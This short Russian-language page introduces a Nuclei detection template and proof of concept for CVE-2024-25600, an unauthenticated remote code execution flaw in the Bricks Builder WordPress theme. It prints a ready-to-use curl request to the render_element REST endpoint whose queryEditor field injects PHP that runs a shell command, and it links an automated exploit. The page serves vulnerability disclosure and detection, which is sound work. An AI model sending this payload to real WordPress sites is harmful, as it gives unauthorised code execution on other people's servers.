
Шаблон Nuclei и информация о POC для CVE-2024-25600
Шаблон Nuclei и информация о PoC для CVE-2024-25600
Тема Bricks для WordPress уязвима к удаленному выполнению кода во всех версиях до 1.9.6 включительно. Это позволяет неаутентифицированным злоумышленникам выполнять код на сервере. Этот шаблон 🛠️ предназначен для обнаружения уязвимости CVE-2024-25600 🕳️, найденной в плагине Bricks Builder для WordPress, с помощью nuclei. Уязвимость позволяет неаутентифицированное удаленное выполнение кода на атакованных веб-сайтах 💻.
Полный PoC (автоматический) доступен по адресу https://github.com/chocapikk/CVE-2024-25600.
Базовый PoC, предоставленный в раскрытии, выглядит следующим образом:
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
"postId": "1",
"nonce": "[NONCE]",
"element": {
"name": "container",
"settings": {
"hasLoop": "true",
"query": {
"useQueryEditor": true,
"queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
"objectType": "post"
}
}
}
}'
Замените [HOST] на целевой веб-сайт, а [NONCE] на значение nonce, полученное с сайта.
Для получения дополнительной информации об уязвимости CVE-2024-25600 обратитесь к подробному раскрытию на Snicco.io.